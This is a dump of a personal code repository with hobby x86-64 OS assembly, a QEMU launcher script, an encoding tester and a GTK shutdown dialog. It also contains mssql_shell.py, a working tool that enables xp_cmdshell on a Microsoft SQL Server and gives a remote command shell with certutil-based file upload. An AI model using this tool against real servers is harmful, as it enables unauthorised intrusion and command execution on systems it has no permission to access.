13 |
14 | division_by_zero_message dw 17
15 | db 'Division by zero!'
16 |
17 | gpf_message dw 25
18 | db 'General Protection Fault!'
19 |
20 | pf_message dw 11
21 | db 'Page Fault!'
22 |
23 |
24 | ;---Code------------------------------------------------------------------------
25 | ISR_dummy:
26 | ;***************************************************************************;
27 | ; Just a dummy generic handler. It prints the message "Interrupt raised!". ;
28 | ;***************************************************************************;
29 | cli
30 | push rax
31 | push r8
32 | push r9
33 | push rsi
34 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN
35 | mov r8, 1
36 | mov r9, 1
37 | mov rsi, int_message
38 | Call Print
39 | pop rsi
40 | pop r9
41 | pop r8
42 | pop rax
43 | .halt: hlt
44 | jmp .halt ; Infinite loop
45 | iretq
46 |
47 |
48 | ISR_Division_by_Zero:
49 | ;***************************************************************************;
50 | ; Divizion by zero handler ;
51 | ;***************************************************************************;
52 | cli
53 | push rax
54 | push r8
55 | push r9
56 | push rsi
57 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN
58 | mov r8, 1
59 | mov r9, 1
60 | mov rsi, division_by_zero_message
61 | Call Print
62 | pop rsi
63 | pop r9
64 | pop r8
65 | pop rax
66 | .halt: hlt
67 | jmp .halt ; Infinite loop
68 | iretq
69 |
70 |
71 | ISR_GPF:
72 | ;***************************************************************************;
73 | ; General Protection Fault handler ;
74 | ;***************************************************************************;
75 | cli
76 | push rax
77 | push r8
78 | push r9
79 | push rsi
80 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN
81 | mov r8, 1
82 | mov r9, 1
83 | mov rsi, gpf_message
84 | Call Print
85 | pop rsi
86 | pop r9
87 | pop r8
88 | pop rax
89 | .halt: hlt
90 | jmp .halt ; Infinite loop
91 | iretq
92 |
93 |
94 | ISR_Page_Fault:
95 | ;***************************************************************************;
96 | ; Page Fault handler ;
97 | ;***************************************************************************;
98 | cli
99 | pop word [error_code_high]
100 | pop word [error_code_low]
101 | push rax
102 | push r8
103 | push r9
104 | push rsi
105 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN
106 | mov r8, 1
107 | mov r9, 1
108 | mov rsi, pf_message
109 | call Print
110 | pop rsi
111 | pop r9
112 | pop r8
113 | pop rax
114 | .halt: hlt
115 | jmp .halt ; Infinite loop
116 | iretq
117 |
118 |
119 | ISR_systimer:
120 | ;*****************************************************************************;
121 | ; System Timer Interrupt Service Routine (IRQ0 mapped to INT 0x20) ;
122 | ;*****************************************************************************;
123 | push rax
124 | inc qword [systimer_ticks]
125 | mov al, PIC_EOI ; Send EOI (End of Interrupt) command
126 | out PIC1_COMMAND, al
127 | pop rax
128 | iretq
129 |
130 |
131 | ISR_keyboard:
132 | ;*****************************************************************************;
133 | ; Keyboard Controller Interrupt Service Routine (IRQ1 mapped to INT 0x21) ;
134 | ;*****************************************************************************;
135 | push rax
136 | xor rax, rax
137 | in al, 0x60 ; MUST read byte from keyboard (else no more interrupts).
138 | mov [keyboard_scancode], al
139 | mov al, PIC_EOI ; Send EOI (End of Interrupt) command
140 | out PIC1_COMMAND, al
141 | pop rax
142 | iretq
143 |
--------------------------------------------------------------------------------
/vms/vm_new:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | if [ $# -lt 1 ]
4 | then
5 | echo "Usage: $0 [android|gsm|macos|parrot|win10] [extra options]"
6 | exit
7 | fi
8 |
9 | case $1 in
10 | "android" )
11 | set -x
12 | qemu-system-x86_64 -name "android" \
13 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 2G \
14 | -drive file=/mnt/SSD/android.qcow2,if=virtio \
15 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::2222-:22 -device virtio-net-pci,netdev=mynet0 \
16 | -display sdl,gl=on -device virtio-vga,virgl=on \
17 | -device qemu-xhci -device usb-tablet \
18 | -audiodev alsa,id=snd0 -device es1370,audiodev=snd0 \
19 | -boot once=c,menu=off \
20 | "${@:2}"
21 | set +x;;
22 | "gsm" )
23 | set -x
24 | qemu-system-x86_64 -name "gsm" \
25 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 4G \
26 | -bios /mnt/SSD/FIRMWARE/edk2-ovmf/OVMF_CODE.fd \
27 | -drive file=/mnt/SSD/gsm.qcow2,if=virtio \
28 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::9022-:22,hostfwd=tcp::9080-:80,hostfwd=tcp::9443-:443 -device virtio-net-pci,netdev=mynet0 \
29 | -nographic \
30 | -device qemu-xhci -device usb-tablet \
31 | -audiodev alsa,id=snd0 -device AC97,audiodev=snd0 \
32 | -boot once=c,menu=off \
33 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/gsm/spice.sock,disable-ticketing \
34 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \
35 | "${@:2}"
36 | set +x;;
37 | "macos" )
38 | set -x
39 | qemu-system-x86_64 -name "macos" \
40 | -machine q35,accel=kvm -nodefaults -smp 4,sockets=1,cores=2,threads=2 -m 4G \
41 | -cpu Penryn,vendor=GenuineIntel,kvm=on,+sse3,+sse4.2,+aes,+xsave,+avx,+xsaveopt,+avx2,+bmi2,+smep,+bmi1,+fma,+movbe,+invtsc \
42 | -device isa-applesmc,osk="ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" -smbios type=2 \
43 | -drive if=pflash,format=raw,readonly,file="/mnt/SSD/FIRMWARE/MACOS/OVMF_CODE.fd" \
44 | -drive if=pflash,format=raw,file="/mnt/SSD/FIRMWARE/MACOS/OVMF_VARS-1024x768.fd" \
45 | -drive id=ESP,if=virtio,format=qcow2,file=/mnt/SSD/FIRMWARE/MACOS/ESP.qcow2 \
46 | -drive id=MyDisk,if=virtio,format=qcow2,file=/mnt/SSD/macos.qcow2 \
47 | -netdev type=user,id=net0,net=192.168.250.0/24,hostfwd=tcp::2022-:22 -device vmxnet3,netdev=net0,id=net0,mac=46:3a:09:e6:f6:21 \
48 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \
49 | -usb -device usb-kbd -device usb-tablet \
50 | -audiodev alsa,id=snd0 -device ich9-intel-hda -device hda-output,audiodev=snd0 \
51 | "${@:2}"
52 | set +x;;
53 | "parrot" )
54 | set -x
55 | qemu-system-x86_64 -name "parrot" \
56 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 3G \
57 | -drive file=/mnt/SSD/parrot.qcow2,if=virtio \
58 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::2222-:22 -device virtio-net-pci,netdev=mynet0 \
59 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \
60 | -device qemu-xhci -device usb-tablet \
61 | -audiodev alsa,id=snd0 -device AC97,audiodev=snd0 \
62 | -boot once=c,menu=off \
63 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/parrot/spice.sock,disable-ticketing \
64 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \
65 | "${@:2}"
66 | set +x;;
67 | "win10" )
68 | set -x
69 | qemu-system-x86_64 -name "win10" \
70 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 4G \
71 | -bios /mnt/SSD/FIRMWARE/edk2-ovmf/OVMF_CODE.fd \
72 | -drive file=/mnt/SSD/win10.qcow2,if=virtio \
73 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::22222-:22 -device virtio-net-pci,netdev=mynet0 \
74 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \
75 | -device qemu-xhci -device usb-tablet \
76 | -audiodev alsa,id=snd0 -device ich9-intel-hda -device hda-output,audiodev=snd0 \
77 | -rtc base=localtime \
78 | -boot once=c,menu=off \
79 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/win10/spice.sock,disable-ticketing \
80 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \
81 | "${@:2}"
82 | esac
83 |
--------------------------------------------------------------------------------
/os/part5/stage2/paging.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Constants-------------------------------------------------------------------
6 | PAGE_PRESENT equ (1 << 0) ; Bit 0 => Page present
7 | PAGE_WRITE equ (1 << 1) ; Bit 1 => Page writable
8 | PAGE_PS equ (1 << 7) ; Bit 7 => 2MB page size, ignore PT
9 | PAGING_DATA equ 0xF000 ; Address to store the paging tables
10 | ; RPL (Requestor Privilege Level - Bits 1-0): 0 is highest, 3 is lowest
11 | ; TI (Table Indicator - Bit 2): 0 => GDT, 1 => LDT
12 | ; Index (Bits 15-3): The index of the segment descriptor within the GDT.
13 | ; Segment Selector = (Index * 8) + (TI * 4) + RPL = (1 * 8) + (0 * 4) + 0 = 8
14 | CODE_SEG equ 8
15 |
16 | ;---Initialized data------------------------------------------------------------
17 |
18 | ;****************************************************************************************;
19 | ; Global Descriptor Table (GDT) ;
20 | ;****************************************************************************************;
21 | ; The Global Descriptor Table (GDT) is a data structure used by x86-family processors ;
22 | ; (starting with the 80286) in order to define the characteristics of the various memory ;
23 | ; areas (segments) used during program execution, including the base address, the size, ;
24 | ; and access privileges like executability and writability. ;
25 | ;****************************************************************************************;
26 | GDT:
27 | .Null:
28 | dq 0x0000000000000000 ; Null Descriptor (should be present).
29 | .Code:
30 | dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read).
31 | dq 0x0000920000000000 ; 64-bit data descriptor (read/write).
32 | ALIGN 4
33 | dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary).
34 | .Pointer:
35 | dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT.
36 | dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
37 |
38 |
39 | ;---Code------------------------------------------------------------------------
40 | Prepare_paging:
41 | ;******************************************************************************;
42 | ; Prepare paging ;
43 | ;------------------------------------------------------------------------------;
44 | ; ES:EDI Should point to a valid 4096-aligned 16KiB buffer. ;
45 | ; SS:ESP Should point to memory that can be used as a small stack. ;
46 | ;******************************************************************************;
47 | mov edi, PAGING_DATA ; Point to 16KiB buffer for the paging structures.
48 | ; Zero out the entire 16KiB buffer (PML4, PDPT, PD, unused PT)
49 | push di ; Store di (rep stosd alters di).
50 | mov ecx, 0x1000 ; Count should be 16384 / 4 = 4096 dwords
51 | xor eax, eax
52 | cld
53 | rep stosd
54 | pop di ; Restore di
55 | ; Build the PML4 (Page Map Level 4): PML4[0] -> PDPT
56 | lea eax, [es:di + 0x1000] ; eax = address of the PDPT
57 | or eax, PAGE_PRESENT | PAGE_WRITE ; Set the flags (present and writable)
58 | mov [es:di], eax ; PML4E[0] = eax
59 | ; Build the PDPT (Page Directory Pointer Table): PDPT[0] -> PD
60 | lea eax, [es:di + 0x2000] ; eax = address of the PD
61 | or eax, PAGE_PRESENT | PAGE_WRITE ; Set the flags (present and writable)
62 | mov [es:di + 0x1000], eax ; PDPT[0] = eax
63 | ; Fill the PD (Page Directory) with 512 entries (each maps a 2 MiB page)
64 | lea di, [di + 0x2000] ; DI now points to start of Page Directory
65 | xor ebx, ebx ; EBX = page index (0 to 511)
66 | mov ecx, 512 ; Number of 2 MiB pages to map
67 | .MapLoop:
68 | mov eax, ebx ; Compute physical address: ebx * 0x200000
69 | shl eax, 21 ; 2^21 = 0x200000 = 2 MiB
70 | ; Set flags: Present, Writable, PS=1 (2 MiB page)
71 | or eax, PAGE_PRESENT | PAGE_WRITE | PAGE_PS
72 | mov [es:di], eax ; Store low 32 bits (each entry is 8 bytes)
73 | mov [es:di + 4], dword 0 ; Store high 32 bits (0 => identity mapping)
74 | add di, 8 ; Advance to next entry
75 | inc ebx ; Increment index
76 | loop .MapLoop
77 | ret
78 |
--------------------------------------------------------------------------------
/os/part3/kernel/video.asm:
--------------------------------------------------------------------------------
1 | BITS 64
2 |
3 | ;---Initialized data----------------------------------------------------------------
4 | VRAM dq 0xB8000
5 |
6 | ;---Constants-----------------------------------------------------------------------
7 | VGA_WIDTH equ 80
8 | VGA_HEIGHT equ 25
9 | ; Colors
10 | VGA_COLOR_BLACK equ 0
11 | VGA_COLOR_BLUE equ 1
12 | VGA_COLOR_GREEN equ 2
13 | VGA_COLOR_CYAN equ 3
14 | VGA_COLOR_RED equ 4
15 | VGA_COLOR_MAGENTA equ 5
16 | VGA_COLOR_BROWN equ 6
17 | VGA_COLOR_LIGHT_GREY equ 7
18 | VGA_COLOR_DARK_GREY equ 8
19 | VGA_COLOR_LIGHT_BLUE equ 9
20 | VGA_COLOR_LIGHT_GREEN equ 10
21 | VGA_COLOR_LIGHT_CYAN equ 11
22 | VGA_COLOR_LIGHT_RED equ 12
23 | VGA_COLOR_LIGHT_MAGENTA equ 13
24 | VGA_COLOR_LIGHT_BROWN equ 14
25 | VGA_COLOR_WHITE equ 15
26 |
27 |
28 | ;---Code---------------------------------------------------------------------------
29 | Fill_screen:
30 | ;*********************************************************************************;
31 | ; Fill screen ;
32 | ;---------------------------------------------------------------------------------;
33 | ; rax (XY__XY__XY__XY__): X -> Background color, Y -> Character color ;
34 | ; rax (__ZZ__ZZ__ZZ__ZZ): ASCII code(s) of character(s) to use to fill the screen ;
35 | ;*********************************************************************************;
36 | mov rdi, [abs VRAM]
37 | mov rcx, 500 ; 80*25 / 4 = 500 (we set 4 characters each time).
38 | rep stosq ; Clear the entire screen.
39 | ret
40 |
41 |
42 | Print:
43 | ;**********************************************************************************;
44 | ; Prints a string ;
45 | ;----------------------------------------------------------------------------------;
46 | ; rsi: pointer to string (first 16 bits = the number of characters in the string.) ;
47 | ; ah: Color attributes ;
48 | ; r8: x ;
49 | ; r9: y ;
50 | ;**********************************************************************************;
51 | push rax
52 | push rcx
53 | push rdx
54 | push rsi
55 | push rdi
56 | push r8
57 | push r9
58 | dec r8
59 | add r8, r8
60 | dec r9
61 | mov rdi, [abs VRAM]
62 |
63 | push rax
64 | mov rax, VGA_WIDTH*2
65 | mul r9
66 | add r8, rax
67 | pop rax
68 | movzx rcx, word [rsi] ; rcx = string length (zero-extend first 16 bits)
69 | add rsi, 2
70 | .string_loop: ; Print all the characters in the string.
71 | lodsb ; al = [rsi], rsi++
72 | mov [rdi+r8], ax ; Write attributes (ah) + character (al) to VRAM.
73 | add rdi, 2 ; Move to next word in VRAM
74 | loop .string_loop ; rcx--, jnz
75 | pop r9
76 | pop r8
77 | pop rdi
78 | pop rsi
79 | pop rdx
80 | pop rcx
81 | pop rax
82 | ret
83 |
84 |
85 | Print_hex:
86 | ;**********************************************************************************;
87 | ; Prints a 16-digit hexadecimal value ;
88 | ;----------------------------------------------------------------------------------;
89 | ; r10: value to be printed ;
90 | ; ah: Color attributes ;
91 | ;**********************************************************************************;
92 | push rcx
93 | push rsi
94 | push r10
95 | sub rsp, 20 ; make space for the string length (2 bytes) and 18 characters
96 | mov rsi, rsp
97 | push rsi ; store rsi (string address)
98 | mov [rsi], word 18 ; string length = 17
99 | mov [rsi+2], word "0x"
100 | add rsi, 19 ; point rsi to the end of the string
101 | mov ecx, 16 ; loop 16 times (one for each digit)
102 | .digit:
103 | push r10 ; store rax
104 | and r10, 0Fh ; isolate digit
105 | add r10b,'0' ; convert to ascii
106 | cmp r10b,'9' ; is hex?
107 | jbe .nohex
108 | add r10b, 7 ; hex
109 | .nohex:
110 | mov [rsi], byte r10b ; store result
111 | dec rsi ; next position
112 | pop r10 ; restore rax
113 | shr r10, 4 ; right shift by 4
114 | loop .digit
115 | pop rsi ; restore rsi (string address)
116 | call Print
117 | add rsp, 20
118 | pop r10
119 | pop rsi
120 | pop rcx
121 | ret
122 |
--------------------------------------------------------------------------------
/os/part4/kernel/video.asm:
--------------------------------------------------------------------------------
1 | BITS 64
2 |
3 | ;---Initialized data----------------------------------------------------------------
4 | VRAM dq 0xB8000
5 |
6 | ;---Constants-----------------------------------------------------------------------
7 | VGA_WIDTH equ 80
8 | VGA_HEIGHT equ 25
9 | ; Colors
10 | VGA_COLOR_BLACK equ 0
11 | VGA_COLOR_BLUE equ 1
12 | VGA_COLOR_GREEN equ 2
13 | VGA_COLOR_CYAN equ 3
14 | VGA_COLOR_RED equ 4
15 | VGA_COLOR_MAGENTA equ 5
16 | VGA_COLOR_BROWN equ 6
17 | VGA_COLOR_LIGHT_GREY equ 7
18 | VGA_COLOR_DARK_GREY equ 8
19 | VGA_COLOR_LIGHT_BLUE equ 9
20 | VGA_COLOR_LIGHT_GREEN equ 10
21 | VGA_COLOR_LIGHT_CYAN equ 11
22 | VGA_COLOR_LIGHT_RED equ 12
23 | VGA_COLOR_LIGHT_MAGENTA equ 13
24 | VGA_COLOR_LIGHT_BROWN equ 14
25 | VGA_COLOR_WHITE equ 15
26 |
27 |
28 | ;---Code---------------------------------------------------------------------------
29 | Fill_screen:
30 | ;*********************************************************************************;
31 | ; Fill screen ;
32 | ;---------------------------------------------------------------------------------;
33 | ; rax (XY__XY__XY__XY__): X -> Background color, Y -> Character color ;
34 | ; rax (__ZZ__ZZ__ZZ__ZZ): ASCII code(s) of character(s) to use to fill the screen ;
35 | ;*********************************************************************************;
36 | mov rdi, [abs VRAM]
37 | mov rcx, 500 ; 80*25 / 4 = 500 (we set 4 characters each time).
38 | rep stosq ; Clear the entire screen.
39 | ret
40 |
41 |
42 | Print:
43 | ;**********************************************************************************;
44 | ; Prints a string ;
45 | ;----------------------------------------------------------------------------------;
46 | ; rsi: pointer to string (first 16 bits = the number of characters in the string.) ;
47 | ; ah: Color attributes ;
48 | ; r8: x ;
49 | ; r9: y ;
50 | ;**********************************************************************************;
51 | push rax
52 | push rcx
53 | push rdx
54 | push rsi
55 | push rdi
56 | push r8
57 | push r9
58 | dec r8
59 | add r8, r8
60 | dec r9
61 | mov rdi, [abs VRAM]
62 |
63 | push rax
64 | mov rax, VGA_WIDTH*2
65 | mul r9
66 | add r8, rax
67 | pop rax
68 | movzx rcx, word [rsi] ; rcx = string length (zero-extend first 16 bits)
69 | add rsi, 2
70 | .string_loop: ; Print all the characters in the string.
71 | lodsb ; al = [rsi], rsi++
72 | mov [rdi+r8], ax ; Write attributes (ah) + character (al) to VRAM.
73 | add rdi, 2 ; Move to next word in VRAM
74 | loop .string_loop ; rcx--, jnz
75 | pop r9
76 | pop r8
77 | pop rdi
78 | pop rsi
79 | pop rdx
80 | pop rcx
81 | pop rax
82 | ret
83 |
84 |
85 | Print_hex:
86 | ;**********************************************************************************;
87 | ; Prints a 16-digit hexadecimal value ;
88 | ;----------------------------------------------------------------------------------;
89 | ; r10: value to be printed ;
90 | ; ah: Color attributes ;
91 | ;**********************************************************************************;
92 | push rcx
93 | push rsi
94 | push r10
95 | sub rsp, 20 ; make space for the string length (2 bytes) and 18 characters
96 | mov rsi, rsp
97 | push rsi ; store rsi (string address)
98 | mov [rsi], word 18 ; string length = 17
99 | mov [rsi+2], word "0x"
100 | add rsi, 19 ; point rsi to the end of the string
101 | mov ecx, 16 ; loop 16 times (one for each digit)
102 | .digit:
103 | push r10 ; store rax
104 | and r10, 0Fh ; isolate digit
105 | add r10b,'0' ; convert to ascii
106 | cmp r10b,'9' ; is hex?
107 | jbe .nohex
108 | add r10b, 7 ; hex
109 | .nohex:
110 | mov [rsi], byte r10b ; store result
111 | dec rsi ; next position
112 | pop r10 ; restore rax
113 | shr r10, 4 ; right shift by 4
114 | loop .digit
115 | pop rsi ; restore rsi (string address)
116 | call Print
117 | add rsp, 20
118 | pop r10
119 | pop rsi
120 | pop rcx
121 | ret
122 |
--------------------------------------------------------------------------------
/mssql/mssql_shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | from __future__ import print_function
3 | # Author: Alamot
4 | # Use pymssql >= 1.0.3 (otherwise it doesn't work correctly)
5 | # To upload a file, type: UPLOAD local_path remote_path
6 | # e.g. UPLOAD myfile.txt C:\temp\myfile.txt
7 | # If you omit the remote_path it uploads the file on the current working folder.
8 | # Be aware that pymssql has some serious memory leak issues when the connection fails (see: https://github.com/pymssql/pymssql/issues/512).
9 | try:
10 | import _mssql
11 | except:
12 | from pymssql import _mssql
13 | import base64
14 | import shlex
15 | import sys
16 | import tqdm
17 | import hashlib
18 | from io import open
19 | try: input = raw_input
20 | except NameError: pass
21 |
22 |
23 | MSSQL_SERVER="10.10.10.10"
24 | MSSQL_USERNAME = "Domain\\sa_user"
25 | MSSQL_PASSWORD = "**********"
26 | BUFFER_SIZE = 5*1024
27 | TIMEOUT = 30
28 |
29 |
30 | def process_result(mssql):
31 | username = ""
32 | computername = ""
33 | cwd = ""
34 | rows = list(mssql)
35 | for row in rows[:-3]:
36 | columns = list(row)
37 | if row[columns[-1]]:
38 | print(row[columns[-1]])
39 | else:
40 | print()
41 | if len(rows) >= 3:
42 | (username, computername) = rows[-3][list(rows[-3])[-1]].split('|')
43 | cwd = rows[-2][list(rows[-3])[-1]]
44 | return (username.rstrip(), computername.rstrip(), cwd.rstrip())
45 |
46 |
47 | def upload(mssql, stored_cwd, local_path, remote_path):
48 | print("Uploading "+local_path+" to "+remote_path)
49 | cmd = 'type nul > "' + remote_path + '.b64"'
50 | mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
51 |
52 | with open(local_path, 'rb') as f:
53 | data = f.read()
54 | md5sum = hashlib.md5(data).hexdigest()
55 | b64enc_data = b"".join(base64.encodestring(data).split()).decode()
56 |
57 | print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")
58 | for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"):
59 | cmd = 'echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "' + remote_path + '.b64"'
60 | mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
61 | #print("Remaining: "+str(len(b64enc_data)-i))
62 |
63 | cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
64 | mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
65 | process_result(mssql)
66 | cmd = 'certutil -hashfile "' + remote_path + '" MD5'
67 | mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
68 | if md5sum in [row[list(row)[-1]].strip() for row in mssql if row[list(row)[-1]]]:
69 | print("MD5 hashes match: " + md5sum)
70 | else:
71 | print("ERROR! MD5 hashes do NOT match!")
72 |
73 |
74 | def shell():
75 | mssql = None
76 | stored_cwd = None
77 | try:
78 | mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
79 | print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)
80 |
81 | print("Trying to enable xp_cmdshell ...")
82 | mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE")
83 |
84 | cmd = 'echo %username%^|%COMPUTERNAME% & cd'
85 | mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
86 | (username, computername, cwd) = process_result(mssql)
87 | stored_cwd = cwd
88 |
89 | while True:
90 | cmd = input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n").replace("'", "''")
91 | if not cmd:
92 | cmd = "call" # Dummy cmd command
93 | if cmd.lower()[0:4] == "exit":
94 | mssql.close()
95 | return
96 | elif cmd[0:6] == "UPLOAD":
97 | upload_cmd = shlex.split(cmd, posix=False)
98 | if len(upload_cmd) < 3:
99 | upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])
100 | else:
101 | upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
102 | cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
103 | mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
104 | (username, computername, cwd) = process_result(mssql)
105 | stored_cwd = cwd
106 |
107 | except _mssql.MssqlDatabaseException as e:
108 | if e.severity <= 16:
109 | print("MSSQL failed: "+str(e))
110 | else:
111 | raise
112 | finally:
113 | if mssql:
114 | mssql.close()
115 |
116 |
117 | shell()
118 | sys.exit()
119 |
--------------------------------------------------------------------------------
/encodings/test_encodings.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | '''
3 | *******************************************************************************
4 | Description: This tool can help you determine the character
5 | encoding of a text file by converting one line from
6 | the file to every(?) possible character encoding.
7 | It writes the converted lines to a new text file
8 | using the same filename but appending the
9 | extension '.encodings' to it.
10 | You have to examine this file visually to find the
11 | correct encoding.
12 |
13 | Usage : test_encodings.py filename [number of line to test]
14 |
15 | Licence : Public Domain.
16 |
17 | Author : Antonios Tsolis (2016)
18 | *******************************************************************************
19 | '''
20 |
21 | import io
22 | import os
23 | import sys
24 | from encodings.aliases import aliases
25 |
26 | encs = {
27 | "ascii", "big5", "big5hkscs",
28 | "cp037", "cp424", "cp437", "cp500", "cp720", "cp737", "cp775",
29 | "cp850", "cp852", "cp855", "cp856", "cp857", "cp858", "cp860",
30 | "cp861", "cp862", "cp863", "cp864", "cp865", "cp866", "cp869",
31 | "cp874", "cp875", "cp932", "cp949", "cp950",
32 | "cp1006", "cp1026", "cp1140", "cp1250", "cp1251", "cp1252",
33 | "cp1253", "cp1254", "cp1255", "cp1256", "cp1257", "cp1258",
34 | "euc_jp", "euc_jis_2004", "euc_jisx0213", "euc_kr",
35 | "gb2312", "gbk", "gb18030", "hz",
36 | "iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004",
37 | "iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr",
38 | "latin_1", "iso8859_2", "iso8859_3", "iso8859_4", "iso8859_5",
39 | "iso8859_6", "iso8859_7", "iso8859_8", "iso8859_9", "iso8859_10",
40 | "iso8859_13", "iso8859_14", "iso8859_15", "iso8859_16",
41 | "johab", "koi8_r", "koi8_u",
42 | "mac_cyrillic", "mac_greek", "mac_iceland",
43 | "mac_latin2", "mac_roman", "mac_turkish",
44 | "ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213",
45 | "utf_32", "utf_32_be", "utf_32_le",
46 | "utf_16", "utf_16_be", "utf_16_le",
47 | "utf_7", "utf_8", "utf_8_sig",
48 | "idna", "mbcs", "palmos", "punycode", "rot_13",
49 | "raw_unicode_escape", "unicode_escape", "unicode_internal",
50 | "base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec"
51 | }
52 |
53 |
54 | def write_encodings(filename, line_number, final_encoding):
55 | # To ensure that we cover as many as possible encodings,
56 | # we take the union between our predefined encoding set and the
57 | # set of the values from the encodings.aliases.aliases.
58 | encodings = encs.union(set(aliases.values()))
59 |
60 | data = dict()
61 |
62 | # Read line from file
63 | try:
64 | with io.open(filename, "rb") as f:
65 | lines = f.readlines()
66 | line = lines[line_number-1]
67 | print("\nProcessing line number: " + str(line_number))
68 | if len(line) < 3:
69 | print("!!!Warning!!!: Possible empty line.")
70 | print("")
71 | except Exception:
72 | _, err, _ = sys.exc_info()
73 | print("Error reading " + filename)
74 | print(err)
75 | sys.exit(1)
76 |
77 | # Decode it using every possible encoding
78 | for enc in encodings:
79 | try:
80 | data[enc] = line.decode(enc)
81 | except Exception:
82 | _, err, _ = sys.exc_info()
83 | print("Cannot decode using " + enc)
84 | # print(err)
85 |
86 | # We write the results in a new utf-8 text file
87 | # We use the same filename + an '.encodings' extension
88 | fpath = os.path.abspath(filename)
89 | newfilename = fpath + '.encodings'
90 | print("\nWriting successfully tested encodings in " + newfilename)
91 |
92 | with open(newfilename, 'w') as out:
93 | c = 0
94 | for enc in sorted(data.keys()):
95 | try:
96 | out.write("%-20s" % enc)
97 | if (sys.version_info[0] < 3):
98 | line = data[enc].encode(final_encoding)
99 | else:
100 | line = data[enc]
101 | out.write(line)
102 | out.write(os.linesep)
103 | c += 1
104 | except Exception:
105 | _, err, _ = sys.exc_info()
106 | print("Cannot encode " + enc + " to " + final_encoding)
107 | # print(err)
108 |
109 | print("\n" + str(c) + " out of " + str(len(encodings)) +
110 | " tested encodings were written.\n")
111 |
112 |
113 | if __name__ == '__main__':
114 | nargs = len(sys.argv)-1
115 | if nargs < 1 or nargs > 2:
116 | exit("Usage: test_encodings.py filename [number of line to test]")
117 | if nargs == 2:
118 | line_number = int(sys.argv[2])
119 | else:
120 | line_number = 1
121 | write_encodings(sys.argv[1], line_number, 'utf_8')
122 |
--------------------------------------------------------------------------------
/shutdown_manager/shutdown-manager-plain:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | **************************************************************
5 | * Description: A gtk GUI with buttons bound to commands. *
6 | * It can be used as a logoff/shutdown interface *
7 | * for windows managers that lack one. *
8 | * *
9 | * Licence : Public Domain. *
10 | * *
11 | * Author : Antonios Tsolis (2016) *
12 | **************************************************************
13 | '''
14 | import os
15 | import gtk
16 | from collections import OrderedDict
17 |
18 |
19 | # We define a get_resource_path function to help us find
20 | # the path of our icons in the system:
21 | def get_resource_path(rel_path):
22 | dir_of_py_file = os.path.dirname(__file__)
23 | rel_path_to_resource = os.path.join(dir_of_py_file, rel_path)
24 | abs_path_to_resource = os.path.abspath(rel_path_to_resource)
25 | return abs_path_to_resource
26 |
27 |
28 | class SystemDialog (gtk.Window):
29 | def __init__(self):
30 | super(SystemDialog, self).__init__()
31 |
